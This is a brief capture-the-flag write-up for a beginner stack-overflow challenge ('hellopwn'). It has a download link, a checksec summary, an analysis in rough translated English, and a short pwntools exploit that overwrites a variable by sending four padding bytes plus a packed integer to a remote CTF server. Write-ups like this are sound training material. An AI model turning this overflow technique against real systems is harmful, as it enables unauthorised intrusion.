File Download:
Links: https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
extraction code: g47i
0x01. Analysis
checksec:
64 program, open NX.
Source:
The process is very simple, as long as the value of this variable is equal to 106c behind this number on it, in front of the read function, obviously stack overflow, just think of ways to change the value of the following variables on the line.
The difference between these two variables was found to 4, so only when the overflow filled void four bytes of information, then that number back filling, can be sub function to perform, get the flag.
0x02.exp
##!/usr/bin/env python
from pwn import*
r=remote("111.198.29.45",44362)
#r=process('./hellopwn')
payload=4*'A'+p64(1853186401)
r.recvuntil("bof")
r.sendline(payload)
r.interactive()